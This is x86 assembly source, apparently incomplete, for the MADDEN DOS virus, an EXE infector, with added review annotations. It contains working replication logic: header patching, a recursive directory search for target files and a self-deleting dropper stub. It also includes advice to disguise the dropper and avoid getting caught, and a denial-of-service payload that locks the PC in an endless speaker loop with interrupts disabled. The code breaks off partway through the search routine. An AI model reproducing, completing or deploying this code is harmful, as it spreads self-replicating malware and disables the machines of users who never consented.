madden.asm
;The MADDEN virus is a DOS EXE file infector which can jump from directory to
;directory. It attaches itself to the end of a file and
;modifies the EXE file header so that it gets control first, before the host
;program. When it is done doing its job, it passes control to the host program,
;so that the host executes without a hint that the virus is there.
;NOTE(review): this is live, self-replicating code. Each run infects one EXE
;it finds (FIND_FILE/INFECT), and when no candidate is left the TOON payload
;disables interrupts and loops forever, so a hard reset is needed. Assemble or
;run it only on an isolated, disposable system (e.g. a DOS VM with no shared
;storage) and never on a machine holding executables you care about.
.SEQ ;segments must appear in sequential order
;to simulate conditions in actual active virus
;MGROUP GROUP HOSTSEG,HSTACK ;Host stack and code segments grouped together
;HOSTSEG program code segment. The virus gains control before this routine and
;attaches itself to another EXE file. As such, the host program for this
;installer simply tries to delete itself off of disk and terminates. That is
;worthwhile if you want to infect a system with the virus without getting
;caught. Just execute the program that infects, and it disappears without a
;trace. You might want to name the program something more innocuous, though.
;MADDEN also locks the pc into a 'maddening' toon when it runs out
;of files to infect. (MADDEN can be assembled to an .obj file under a86,
;then linked to the 'infected' .exe form.)
HOSTSEG SEGMENT BYTE
ASSUME CS:HOSTSEG,SS:HSTACK
;--------------------------------------------------------------------------
;Host stub of the dropper. In the assembled "pre-infected" image this is the
;code VIRUS reaches through the far jump at REL2 when it is done. It unlinks
;its own executable (DOS fn 41H) and exits with return code 0 (fn 4CH).
;PGMSTR is a bare file name: fn 41H resolves it against the current drive and
;directory, so the self-delete only works if the dropper was launched from the
;directory holding MADDEN.EXE under exactly that name. The carry flag / error
;code returned by fn 41H is never examined, so a failed delete (file read-only,
;still open, or not in the current directory) silently leaves the dropper on
;disk.
;--------------------------------------------------------------------------
PGMSTR DB 'MADDEN.EXE',0 ;ASCIIZ name handed to fn 41H (no drive, no path)
HOST:
mov ax,cs ;we want DS=CS here (fn 41H takes the name at DS:DX)
mov ds,ax
mov dx,OFFSET PGMSTR
mov ah,41H
int 21H ;delete this exe file (unlink); result is not checked
mov ah,4CH
mov al,0
int 21H ;terminate normally with exit code 0
HOSTSEG ENDS
;Host program stack segment. VIRUS switches SS:SP to this segment at the
;REL1/REL1A markers (after interrupts are disabled) just before the far jump
;to HOST, so the host stub never runs on the virus stack.
HSTACK SEGMENT PARA STACK
db 100H dup (?) ;100H = 256 bytes of uninitialised stack (the earlier "100 bytes" comment mixed up the radix)
HSTACK ENDS
;------------------------------------------------------------------------
;This is the virus itself
STACKSIZE EQU 100H ;size of stack for the virus; not referenced anywhere in the part of the file shown here (VSTACK is assumed in VSEG but declared outside this page)
NUMRELS EQU 2 ;number of relocatables in the virus, which must go in the relocatable pointer table; per the REL1/REL2 comments these are the segment words in 'mov bx,HSTACK' and 'jmp FAR PTR HOST'
;VGROUP GROUP VSEG,VSTACK ;Virus code and stack segments grouped together
;MADDEN Virus code segment. This gains control first, before the host. As this
;ASM file is laid out, this program will look exactly like a simple program
;that was infected by the virus.
VSEG SEGMENT PARA
ASSUME CS:VSEG,DS:VSEG,SS:VSTACK
;data storage area comes before any code
;Layout matters: VIRUS addresses everything here with DS=CS, and the REL1/REL2
;relocation markers depend on the exact image layout, so do not reorder or
;resize these fields without revisiting the infector.
VIRUSID DW 0C8AAH ;identifies virus; the marker compared against VIDC (below) to avoid re-infecting a file
OLDDTA DD 0 ;old DTA segment and offset (offset at +0, segment at +2); VIRUS seeds the segment with the PSP segment at entry
DTA1 DB 2BH dup (?) ;new disk transfer area: 2BH (43) bytes, one DOS find-first/find-next record
DTA2 DB 56H dup (?) ;dta for directory finds (2 deep): 2 * 2BH, one record per search level (FINDBR indexes it by LEVEL*2BH)
EXE_HDR DB 1CH dup (?) ;buffer for EXE file header: 1CH (28) bytes, the fixed part of the MZ header
EXEFILE DB '\*.EXE',0 ;search string for an exe file
ALLFILE DB '\*.*',0 ;search string for any file (used to enumerate subdirectories)
USEFILE DB 78 dup (?) ;area to put valid file path; CONCAT appends to it and no length check is visible on this page - TODO confirm CONCAT bounds the write
LEVEL DB 0 ;depth to search directories for a file (set by FIND_FILE, decremented by FINDBR on each descent)
HANDLE DW 0 ;file handle
FATTR DB 0 ;old file attribute storage area
FTIME DW 0 ;old file time stamp storage area
FDATE DW 0 ;old file date stamp storage area
FSIZE DD 0 ;file size storage area
VIDC DW 0 ;storage area to put VIRUSID from new host .EXE in, to check if virus already there (the comparing routine is not on this page)
VCODE DB 1 ;identifies this version
;--------------------------------------------------------------------------
;MUZIK - note table consumed by the TOON payload. Entries are word pairs:
;  xxxx = reload value written to PIT channel 2 (port 42h, LSB then MSB)
;  yyyy = outer repeat count of TOON's busy-wait delay (8000 LOOP iterations
;         per count, so the tempo depends on CPU speed, not on a timer)
;The table ends with 0FFFFh in the frequency position. A repeat count of 0
;would wrap and spin 65536 times (dec/jnz); no count below is 0.
;NOTE(review): the header says this file is assembled with A86. A86 is
;documented as treating a numeric literal that starts with 0 as hexadecimal,
;so 0020/0010 would assemble as 32/16 rather than 20/10 (0006 is 6 either
;way); MASM reads them as decimal. Confirm against the assembler actually used.
;Also note the inconsistent trailing commas (present on some lines, absent on
;others) - whether a trailing comma is accepted is assembler-dependent.
;--------------------------------------------------------------------------
MUZIK dw 4304,0006, 4063,0006, 4304,0006, 4063,0006, ;MUZIK - notes/delay
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006, ;in format xxxx,yyyy
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 5119,0006, 5423,0006, 3043,0006,
dw 6087,0020,
dw 6087,0006,
dw 7239,0006, 3619,0006, 4831,0006, 6087,0006
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 6087,0006, 4063,0006, 3043,0006, 5119,0006
dw 4831,0006, 6087,0006, 7239,0006, 8126,0006
dw 6087,0020,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 5119,0006, 5423,0006, 3043,0006,
dw 6087,0020,
dw 6087,0006,
dw 7239,0006, 3619,0006, 4831,0006, 6087,0006
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 6087,0006, 4063,0006, 3043,0006, 5119,0006
dw 4831,0006, 6087,0006, 7239,0006, 8126,0006
dw 6087,0020,
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 3043,0006, 3619,0006, 4831,0006, 6087,0006
dw 3043,0010,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 4831,0006, 4063,0006, 3043,0006,
dw 4304,0006, 4063,0006, 4304,0006, 4063,0006,
dw 3043,0006, 5119,0006, 5423,0006, 3043,0006,
dw 6087,0020,
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 3043,0006, 3619,0006, 4831,0006, 6087,0006
dw 3043,0010,
dw 6087,0006,
dw 7239,0006, 3619,0006, 4831,0006, 6087,0006
dw 7670,0006, 7239,0006, 4831,0006, 3619,0006
dw 6087,0006, 4063,0006, 3043,0006, 5119,0006
dw 4831,0006, 6087,0006, 7239,0006, 8126,0006
dw 6087,0020,
dw 0ffffh ;end-of-table marker checked by TOON2
;--------------------------------------------------------------------------
;MADDEN virus main routine starts here
;
;Entry: first code executed in an infected EXE (the patched header's CS:IP).
;       ES = PSP segment, as DOS leaves it at EXE entry; AX is pushed on the
;       virus stack so it can be handed to the host unchanged.
;Exit:  never returns. Either falls through REL1/REL2 to the host's own
;       SS:SP and CS:IP, or jumps to TOON, which loops forever.
;Note:  AX is only restored on the FINISH path. The early 'jnz REL1' skips
;       the pop, so on that path the host receives whatever SHOULDRUN left in
;       AX (and one word stays on the virus stack, which is then discarded by
;       the stack switch).
;--------------------------------------------------------------------------
VIRUS:
push ax ;save startup info in ax (on the virus stack, VSTACK)
mov ax,cs
mov ds,ax ;set up DS=CS for the virus (all variables above are CS-relative)
mov ax,es ;get PSP Seg
mov WORD PTR [OLDDTA+2],ax ;set up default DTA Seg=PSP Seg in case of abort without getting it
call SHOULDRUN ;run only when certain conditions met signalled by z set (SETSR below rewrites this routine: self-modifying code, neither is on this page)
jnz REL1 ;conditions aren't met, go execute host program (skips RESTORE_DTA and the pop ax below)
call SETSR ;modify SHOULDRUN procedure to activate conditions
call NEW_DTA ;set up a new DTA location
call FIND_FILE ;get an exe file to attack
jnz TOON ;returned nz - no valid files left, play maddening toon! (TOON never returns: the DTA is not restored and the host never runs)
call SAVE_ATTRIBUTE ;save the file attributes and leave file opened in r/w mode
call INFECT ;move program code to file we found to attack
call REST_ATTRIBUTE ;restore the original file attributes and close the file
FINISH: call RESTORE_DTA ;restore the DTA to its original value at startup
pop ax ;restore startup value of ax
REL1: ;relocatable marker for host stack segment
mov bx,HSTACK ;set up host program stack segment in BX (the old "ax=segment" remark was stale); this immediate is one of the NUMRELS relocation entries and is presumably patched to the host's SS by INFECT (not on this page)
cli ;interrupts off while changing stack
mov ss,bx
REL1A: ;marker for host stack pointer
mov sp,OFFSET HSTACK ;immediate presumably patched to the host's original SP at infection time (per the REL1A marker comment)
mov es,WORD PTR [OLDDTA+2] ;set up ES correctly (PSP segment stored at entry)
mov ds,WORD PTR [OLDDTA+2] ;and DS - both point at the PSP, as DOS leaves them at EXE entry
sti ;interrupts back on
REL2: ;relocatable marker for host code segment
jmp FAR PTR HOST ;begin execution of host program (the segment word is the second relocation entry; presumably patched to the host's CS:IP by INFECT)
;--------------------------------------------------------------------------
;First Level - Find a file which passes FILE_OK
;
;This routine does a complex directory search to find an EXE file in the
;current directory, one of its subdirectories, or the root directory or one
;of its subdirectories, to find a file for which FILE_OK returns with C reset.
;If you want to change the depth of the search, make sure to allocate enough
;room at DTA2. This variable needs to have 2BH * LEVEL bytes in it to work,
;since the recursive FINDBR uses a different DTA area for the search (see DOS
;functions 4EH and 4FH) on each level.
;
;In:  DS = VSEG (set up by VIRUS).
;Out: Z set   -> USEFILE holds the path of a file that passed FILE_OK
;     Z clear -> nothing found (VIRUS then jumps to TOON)
;Clobbers: AX, DL, SI, plus whatever FINDBR clobbers; USEFILE and LEVEL are
;overwritten.
;Search order: current directory + 2 levels of subdirectories, then the root
;+ 1 level. The carry flag from DOS fn 47H (e.g. invalid drive) is not
;checked, so USEFILE is used as-is whatever fn 47H did.
;
FIND_FILE:
mov al,'\' ;set up current directory path in USEFILE
mov BYTE PTR [USEFILE],al
mov si,OFFSET USEFILE+1
xor dl,dl ;DL=0 selects the default (current) drive
mov ah,47H
int 21H ;get current dir, USEFILE= \dir (fn 47H returns the path without leading '\' or drive, hence the '\' stored first; DOS documents the buffer as 64 bytes, USEFILE is 78)
cmp BYTE PTR [USEFILE+1],0 ;see if it is null. If so, its the root
jnz FF2 ;not the root
xor al,al ;make correction for root directory,
mov BYTE PTR [USEFILE],al ;by setting USEFILE = '' (a lone '\' would otherwise yield '\\*.EXE' once CONCAT appends the pattern)
FF2: mov al,2
mov [LEVEL],al ;search 2 subdirs deep
call FINDBR ;attempt to locate a valid file
jz FF3 ;found one - exit
xor al,al ;nope - try the root directory
mov BYTE PTR [USEFILE],al ;by setting USEFILE= ''
inc al ;al=1
mov [LEVEL],al ;search one subdir deep
call FINDBR ;attempt to find file
FF3:
ret ;exit with z flag set by FINDBR to indicate success/failure
;***************************************************************************
; This routine enables MADDEN virus to compell the pc to play a
;'maddening' toon when it can't find a file to infect
;
;TOON - denial-of-service payload. Programs PIT channel 2 as a square-wave
;generator feeding the PC speaker, then steps through MUZIK forever.
;In:  DS = VSEG (MUZIK is read via DS:SI).
;Out: never returns. Interrupts are disabled for almost the entire loop: the
;only window is between the sti at GO_MUZIK2 and the cli at TOON (one jmp),
;once per pass through the table, so keyboard/INT 9 servicing - and with it
;Ctrl-Alt-Del - is effectively blocked; only a hardware reset or power cycle
;recovers the machine.
;Clobbers: AX, CX, SI, direction flag (cleared). Nothing after the calling
;jnz in VIRUS ever runs (DTA not restored, host not started).
;Timing is a CPU-bound busy loop (8000 LOOP iterations x repeat count), not
;timer based, so the tempo scales with clock speed.
;**************************************************************************
TOON:
cli ;interrupts off
mov al,10110110xb ;the magic number: PIT command byte - channel 2, lobyte/hibyte access, mode 3 (square wave), binary count ('xb' is the A86 binary suffix)
out 43h,al ;send it
lea si,MUZIK ;point (si) to our note table
TOON2: cld ;must increment forward
lodsw ;load word into ax and increment (si): ax = channel 2 reload value
cmp ax,0ffffh ;is it ffff - if so end of table
jz GO_MUZIK2 ;so, time to jump into endless loop
out 42h,al ;send LSB first
mov al,ah ;place MSB in al
out 42h,al ;send it next
in al,61h ;get value to turn on speaker (port 61h: bit0 = timer 2 gate, bit1 = speaker data)
or al,00000011xb ;OR the gotten value
out 61h,al ;now we turn on speaker
lodsw ;load the repeat loop count into (ax)
LOOP6: mov cx,8000 ;delay count
LOOP7: loop LOOP7 ;do the delay
dec ax ;decrement repeat count (a count of 0 would wrap and spin 65536 times; MUZIK contains none)
jnz loop6 ;if not = 0 loop back
in al,61h ;all done
and al,11111100xb ;number turns speaker off
out 61h,al ;send it
jmp short TOON2 ;now go do next note
GO_MUZIK2: ;our loop point
sti ;enable interrupts (effective for one instruction only - TOON's cli follows)
jmp TOON ;jump back to beginning - this code
; has the additional advantage of
;locking out CTRL-ALT-DEL reboot.
;The user must do a hard reset to recover.
;--------------------------------------------------------------------------
;SEARCH FUNCTION
;---------------------------------------------------------------------------
;Second Level - Find in a branch
;
;This function searches the directory specified in USEFILE for EXE files.
;after searching the specified directory, it searches subdirectories to the
;depth LEVEL. If an EXE file is found for which FILE_OK returns with C reset, this
;routine exits with Z set and leaves the file and path in USEFILE
;
FINDBR:
call FINDEXE ;search current dir for EXE first
jnc FBE3 ;found it - exit
cmp [LEVEL],0 ;no - do we want to go another directory deeper?
jz FBE1 ;no - exit
dec [LEVEL] ;yes - decrement LEVEL and continue
mov di,OFFSET USEFILE ;'\curr_dir' is here
mov si,OFFSET ALLFILE ;'\*.*' is here
call CONCAT ;get '\curr_dir\*.*' in USEFILE
inc di
push di ;store pointer to first *
call FIRSTDIR ;get first subdirectory
jnz FBE ;couldn't find it, so quit
FB1: ;otherwise, check it out
pop di ;strip \*.* off of USEFILE
xor al,al
stosb
mov di,OFFSET USEFILE
mov bx,OFFSET DTA2+1EH
mov al,[LEVEL]
mov dl,2BH ;compute correct DTA location for subdir name
mul dl ;which depends on the depth we're at in the search
add bx,ax ;bx points to directory name